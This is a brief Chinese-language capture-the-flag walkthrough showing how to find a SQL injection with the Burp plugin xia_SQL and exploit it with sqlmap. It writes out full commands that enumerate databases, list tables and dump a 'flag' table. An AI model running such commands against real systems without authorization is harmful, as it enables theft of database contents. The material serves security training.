这里我们借助一个burp插件“xia_SQL”这里我们【启动插件】【监控Proxy】然后在页面上多点点xia_SQL就会被动进行SQL注入测试查看“xia_SQL”可以看到xia_SQL会给疑似存在SQL注入的连接打勾我们把请求转发到Repeater然后将-0去掉添加*添加*是SQLMAP中的用法是为了告诉SQLMAP这里存在注入点这样可以加快SQLMAP扫描进程然后我们通过明动转发给SQLMAP这里就是调用SQLMAP的命令其中--batch表示需要用户交互的过程都选择默认、--level 3表示测试等级3会测试更多payload--threads 10 表示10线程可以看到存在SQL注入漏洞我们将上面的命令复制下来添加--dbs来爆破数据库名python sqlmap.py -r C:\Users\ANONYM~1\AppData\Local\Temp\\request-20260401205912.raw --batch --level 3 --threads 10 --dbs看到出现4个数据库这里我们选择web接下来我们获取web数据库中的数据表python sqlmap.py -r C:\Users\ANONYM~1\AppData\Local\Temp\\request-20260401205912.raw --batch --level 3 --threads 10 -D web --tables发现有一个flag数据表我们添加--dump来获取flag表中的数据python sqlmap.py -r C:\Users\ANONYM~1\AppData\Local\Temp\\request-20260401205912.raw --batch --level 3 --threads 10 -D web -T flag --dump得到flag